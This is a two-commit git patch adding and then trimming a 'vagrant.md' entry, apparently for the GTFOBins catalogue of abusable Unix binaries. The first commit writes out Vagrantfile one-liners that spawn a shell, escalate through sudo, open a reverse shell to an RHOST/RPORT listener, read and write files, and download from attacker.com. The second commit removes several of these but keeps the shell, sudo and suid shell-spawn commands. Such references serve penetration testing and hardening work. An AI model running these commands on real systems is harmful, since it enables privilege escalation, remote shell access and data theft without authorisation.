From e05b154647c59987188e61454ff75b98786005c0 Mon Sep 17 00:00:00 2001
From: PPong <102512960+ham45X13y@users.noreply.github.com>
Date: Wed, 29 Mar 2023 18:34:57 +0200
Subject: [PATCH 1/2] Add vagrant.md

---
 _gtfobins/vagrant.md | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 _gtfobins/vagrant.md

diff --git a/_gtfobins/vagrant.md b/_gtfobins/vagrant.md
new file mode 100644
index 0000000..95de912
--- /dev/null
+++ b/_gtfobins/vagrant.md
@@ -0,0 +1,30 @@
+---
+description: |
+Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
+More Info at https://gtfobins.github.io/gtfobins/ruby/
+functions:
+  shell:
+    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up
+    -
+  sudo:
+    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up
+  reverse-shell:
+    - description: |
+        Run `nc -lvnp RPORT` on the attacker box.
+        Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell.
+      code: |
+        mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up
+  file-write:
+    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up
+  file-read:
+    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
+  library-load:
+    - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+  file-download:
+    - description: Fetch a remote file via HTTP GET request.
+      code: |
+        export URL=http://attacker.com/file_to_get
+        export LFILE=file_to_save
+        mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
+---
+

From f121dff1cc50157a70e5a6bb1d0c2d75a09c1594 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Thu, 13 Apr 2023 08:34:09 +0200
Subject: [PATCH 2/2] Simplify vagrant

---
 _gtfobins/vagrant.md | 38 ++++++++++++++------------------------
 1 file changed, 14 insertions(+), 24 deletions(-)

diff --git a/_gtfobins/vagrant.md b/_gtfobins/vagrant.md
index 95de912..c297c81 100644
--- a/_gtfobins/vagrant.md
+++ b/_gtfobins/vagrant.md
@@ -1,30 +1,20 @@
 ---
-description: |
-Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
-More Info at https://gtfobins.github.io/gtfobins/ruby/
+description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
 functions:
   shell:
-    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up
-    -
+    - code: |
+        cd $(mktemp -d)
+        echo 'exec "/bin/sh"' > Vagrantfile
+        vagrant up
   sudo:
-    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up
-  reverse-shell:
-    - description: |
-        Run `nc -lvnp RPORT` on the attacker box.
-        Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell.
-      code: |
-        mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up
-  file-write:
-    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up
-  file-read:
-    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
-  library-load:
-    - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
-  file-download:
-    - description: Fetch a remote file via HTTP GET request.
-      code: |
-        export URL=http://attacker.com/file_to_get
-        export LFILE=file_to_save
-        mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
+    - code: |
+        cd $(mktemp -d)
+        echo 'exec "/bin/sh"' > Vagrantfile
+        vagrant up
+  suid:
+    - code: |
+        cd $(mktemp -d)
+        echo 'exec "/bin/sh -p"' > Vagrantfile
+        vagrant up
 ---